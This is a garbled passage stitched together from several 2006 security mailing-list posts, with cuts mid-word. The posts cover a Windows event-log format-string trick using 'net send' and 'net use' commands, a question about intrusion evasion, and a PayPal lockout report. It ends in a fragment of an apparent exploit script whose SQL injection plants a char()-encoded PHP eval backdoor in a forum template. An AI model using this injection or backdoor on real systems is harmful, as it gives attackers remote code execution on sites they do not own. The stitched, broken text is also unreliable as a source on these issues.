--Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]:
T> 3APA3A, have you tried to see if elements like "%n!FORMAT!" used
T> recursively will invoke the wsprintf()-like behavior??
Yes, I did. It doesn't work.
Dear lists,
in another Russian forum, Killer{R} made an analysis of this issue using
Windows 2000 sources:
http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672
The problem is in win32k.sys' function GetHardErrorText, which tries to
prepare EXCEPTION data for the event log, and seems to b
sting event log entries if you try
something like:
net send SOMEHOST %2
or
net use \\SOMEHOST\IPC$ /user:%1%2%3
Dear Kassem Nasser,
It's not clear, do you mean protection or protection evasion?
--Sunday, December 10, 2006, 10:50:41 PM, you wrote to
full-disclosure@lists.grok.org.uk:
KN> Dear all,
KN> I am interested in knowing evasion schemes for application based
KN> intrusions available,
hursday, November 30, 2006, 1:02:07 AM, you wrote to [EMAIL PROTECTED]:
MF> I tried this on Paypal.com, with more than twenty consecutive incorrect
MF> passwords. I got no such offer. What paypal site were you using, and
MF> how many unsuccessful attempts is a couple?
MF> Matt
M
e inexperienced with PayPal, because its service for Russia is
new and very limited. But it makes me wonder: is this "Feature" known?
27;,[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES
(char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);